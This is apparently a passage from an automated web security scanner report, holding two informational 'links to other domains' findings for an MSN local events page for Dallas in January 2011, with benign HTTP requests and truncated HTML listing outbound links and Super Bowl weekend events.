<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1372&amp;FORM=MSNLEC">Hotels &amp; motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75201&amp;order=distance&amp;FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&amp;order=distance&amp;FORM=MSNLEC">Sports &amp; recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&amp;FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&amp;unit=F&amp;qpvt=weather+Dallas&amp;form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&amp;lr=CBMSN&amp;sc_extcmp=JS_MSN_QSBox&amp;s_rawwords=&amp;s_freeloc=75201">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&amp;source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&amp;where=75201">Yellow pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/weather/today?q=Dallas, Texas weather&amp;unit=F&amp;Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&amp;resize=false">Feedback</a>
...[SNIP]...

22.121. http://local.redacted/movies-events.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /movies-events.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /movies-events.aspx?zip=75207&q=75207 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=29617873f99d4f4aadb0f805a060bc63; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=89FBA17A031A48A3A7AF8A631C05BD5B; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406229&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flocal.redacted%2Fmovies-events.aspx%3Fzip%3D75207%26q%3D75207&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&amp;mkt=en-us&amp;FORM=MSNLEC">Sunday, Jan. 30, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=306&amp;FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=533&amp;FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1090&amp;FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&amp;order=distance&amp;FORM=MSNLEC">Government &amp; community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1372&amp;FORM=MSNLEC">Hotels &amp; motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&amp;order=distance&amp;FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&amp;order=distance&amp;FORM=MSNLEC">Sports &amp; recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&amp;FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&amp;unit=F&amp;qpvt=weather+Dallas&amp;form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&amp;lr=CBMSN&amp;sc_extcmp=JS_MSN_QSBox&amp;s_rawwords=&amp;s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&amp;source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&amp;where=75207">Yellow pages</a>
...[SNIP]...
</span><a href="http://www.bing.com/events/search?form=MSNLAP&amp;q=events+near+75207" class="attr">Find more events</a>
...[SNIP]...
<div class="events"><a href="http://www.bing.com/events/search?q=Dane Cook&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z149220025&quot;]&amp;form=MSNLAP" class="featuredlink">
<img alt="Dane Cook" height="100" width="100" src="http://www.bing.com//getimage?q=FEV3_2843a0f4fa9b85c7b077cec9a90921c4_1&amp;wf=Genimage" />
</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Dane Cook&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z149220025&quot;]&amp;form=MSNLAP" title="Dane Cook">Dane Cook</a>
...[SNIP]...
<p>On the heels of one of the most successful standup tours in recent history, comedian Dane Cook will ...<a href="http://www.bing.com/events/search?q=Dane Cook&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z149220025&quot;]&amp;form=MSNLAP">more</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z162394705&quot;]&amp;form=MSNLAP" title="2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks">2011 Dallas Super Bowl Weekend - Fantasy Party - ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Mamma Mia!&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z129219765&quot;]&amp;form=MSNLAP" title="Mamma Mia!">Mamma Mia!</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=NFL Experience&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;f538503&quot;]&amp;form=MSNLAP" title="NFL Experience">NFL Experience</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Harlem Globetrotters&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z149225805&quot;]&amp;form=MSNLAP" title="Harlem Globetrotters">Harlem Globetrotters</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z162393185&quot;]&amp;form=MSNLAP" title="2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta">2011 Super Bowl XLV Weekend Party - Hosted by the ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Penthouse Magazine &quot;Super Party 2011&quot; Super Bowl event&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z162078765&quot;]&amp;form=MSNLAP" title="Penthouse Magazine &quot;Super Party 2011&quot; Super Bowl event">Penthouse Magazine "Super Party 2011" Super Bowl ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=NFLX After Dark at The NFL Experience&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z157228725&quot;]&amp;form=MSNLAP" title="NFLX After Dark at The NFL Experience">NFLX After Dark at The NFL Experience</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=P. Diddy's Super Bowl Grand Finale Party&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z156625485&quot;]&amp;form=MSNLAP" title="P. Diddy's Super Bowl Grand Finale Party">P. Diddy's Super Bowl Grand Finale Party</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=12th Annual Superbowl Gospel Celebration&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z144523185&quot;]&amp;form=MSNLAP" title="12th Annual Superbowl Gospel Celebration">12th Annual Superbowl Gospel Celebration</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c100&quot;]&amp;form=MSNLAP">Arts &amp; crafts</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c500&quot;]&amp;form=MSNLAP">Education &amp; campus</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c1000&quot;]&amp;form=MSNLAP">Performing arts</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c200&quot;]&amp;form=MSNLAP">Business &amp; tech</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c600&quot;]&amp;form=MSNLAP">Fairs &amp; festivals</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c1100&quot;]&amp;form=MSNLAP">Shopping</a></li><li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c300&quot;]&amp;form=MSNLAP">Community</a></li><li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c700&quot;]&amp;form=MSNLAP">Food &amp; dining</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c1200&quot;]&amp;form=MSNLAP">Sports &amp; outdoors</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c400&quot;]&amp;form=MSNLAP">Dance</a></li><li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c800&quot;]&amp;form=MSNLAP">Music</a></li><li class="last"><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c1300&quot;]&amp;form=MSNLAP">Visual arts</a>
...[SNIP]...
<a href="http://movies.msn.com/Movies/movie.aspx?m=2277707&amp;mp=m" title="The Mechanic"><img alt="The Mechanic" src="http://entimg.s-msn.com/i/CS/088884h1.jpg" width="130" height="190" /></a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Dane Cook&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z149220025&quot;]&amp;form=MSNLAP">Dane Cook</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z162394705&quot;]&amp;form=MSNLAP">2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z162393185&quot;]&amp;form=MSNLAP">2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Penthouse Magazine &quot;Super Party 2011&quot; Super Bowl event&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z162078765&quot;]&amp;form=MSNLAP">Penthouse Magazine "Super Party 2011" Super Bowl event</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=P. Diddy's Super Bowl Grand Finale Party&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z156625485&quot;]&amp;form=MSNLAP">P. Diddy's Super Bowl Grand Finale Party</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=VeakLjTh&amp;resize=false">Feedback</a>
...[SNIP]...

22.122. http://local.redacted/movies-events.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /movies-events.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /movies-events.aspx?zip=75207&q=75207 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1f11c957e6a04e84b207afdf9942c489; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=9B9348005D1E4BCE91C8A16ABA3EA768; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:43 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344863&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flocal.redacted%2Fmovies-events.aspx%3Fzip%3D75207%26q%3D75207&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&amp;mkt=en-us&amp;FORM=MSNLEC">Saturday, Jan. 29, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=306&amp;FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=533&amp;FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1090&amp;FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&amp;order=distance&amp;FORM=MSNLEC">Government &amp; community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1372&amp;FORM=MSNLEC">Hotels &amp; motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&amp;order=distance&amp;FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&amp;order=distance&amp;FORM=MSNLEC">Sports &amp; recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&amp;FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&amp;unit=F&amp;qpvt=weather+Dallas&amp;form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&amp;lr=CBMSN&amp;sc_extcmp=JS_MSN_QSBox&amp;s_rawwords=&amp;s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&amp;source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&amp;where=75207">Yellow pages</a>
...[SNIP]...
</span><a href="http://www.bing.com/events/search?form=MSNLAP&amp;q=events+near+75207" class="attr">Find more events</a>
...[SNIP]...
<div class="events"><a href="http://www.bing.com/events/search?q=50th Anniversary Celebration presented by Texas Ballet Theater&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z130863645&quot;]&amp;form=MSNLAP" class="featuredlink">
<img alt="50th Anniversary Celebration presented by Texas Ballet Theater" height="100" width="100" src="http://www.bing.com//getimage?q=FEV3_9cc8b157ca6c8d0d313f3bdedcd4389c_1&amp;wf=Genimage" />
</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=50th Anniversary Celebration presented by Texas Ballet Theater&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z130863645&quot;]&amp;form=MSNLAP" title="50th Anniversary Celebration presented by Texas Ballet Theater">50th Anniversary Celebration presented by Texas ...</a>
...[SNIP]...
<p>STEVENSONS FOUR LAST SONGSEvoking both passion and empathy, Ben Stevensons emotional interpretation ...<a href="http://www.bing.com/events/search?q=50th Anniversary Celebration presented by Texas Ballet Theater&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z130863645&quot;]&amp;form=MSNLAP">more</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Dane Cook&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z149220025&quot;]&amp;form=MSNLAP" title="Dane Cook">Dane Cook</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=NFL Experience&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;f538503&quot;]&amp;form=MSNLAP" title="NFL Experience">NFL Experience</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Harlem Globetrotters&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z149225805&quot;]&amp;form=MSNLAP" title="Harlem Globetrotters">Harlem Globetrotters</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z162394705&quot;]&amp;form=MSNLAP" title="2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks">2011 Dallas Super Bowl Weekend - Fantasy Party - ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z162393185&quot;]&amp;form=MSNLAP" title="2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta">2011 Super Bowl XLV Weekend Party - Hosted by the ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=P. Diddy's Super Bowl Grand Finale Party&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z156625485&quot;]&amp;form=MSNLAP" title="P. Diddy's Super Bowl Grand Finale Party">P. Diddy's Super Bowl Grand Finale Party</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Penthouse Magazine &quot;Super Party 2011&quot; Super Bowl event&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z162078765&quot;]&amp;form=MSNLAP" title="Penthouse Magazine &quot;Super Party 2011&quot; Super Bowl event">Penthouse Magazine "Super Party 2011" Super Bowl ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Everything's Bigger in Texas Party DUEX Super Celebrity Party&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z155484965&quot;]&amp;form=MSNLAP" title="Everything's Bigger in Texas Party DUEX Super Celebrity Party">Everything's Bigger in Texas Party DUEX Super ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=NFLX After Dark at The NFL Experience&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z157228725&quot;]&amp;form=MSNLAP" title="NFLX After Dark at The NFL Experience">NFLX After Dark at The NFL Experience</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c100&quot;]&amp;form=MSNLAP">Arts &amp; crafts</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c500&quot;]&amp;form=MSNLAP">Education &amp; campus</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c1000&quot;]&amp;form=MSNLAP">Performing arts</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c200&quot;]&amp;form=MSNLAP">Business &amp; tech</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c600&quot;]&amp;form=MSNLAP">Fairs &amp; festivals</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c1100&quot;]&amp;form=MSNLAP">Shopping</a></li><li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c300&quot;]&amp;form=MSNLAP">Community</a></li><li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c700&quot;]&amp;form=MSNLAP">Food &amp; dining</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c1200&quot;]&amp;form=MSNLAP">Sports &amp; outdoors</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c400&quot;]&amp;form=MSNLAP">Dance</a></li><li><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c800&quot;]&amp;form=MSNLAP">Music</a></li><li class="last"><a href="http://www.bing.com/events/search?q=75207+events&amp;p1=[Events+source=&quot;vertical&quot;+cat=&quot;c1300&quot;]&amp;form=MSNLAP">Visual arts</a>
...[SNIP]...
<a href="http://movies.msn.com/Movies/movie.aspx?m=2277707&amp;mp=m" title="The Mechanic"><img alt="The Mechanic" src="http://entimg.s-msn.com/i/CS/088884h1.jpg" width="130" height="190" /></a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=NFL Experience&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;f538503&quot;]&amp;form=MSNLAP">NFL Experience</a>
...[SNIP]...
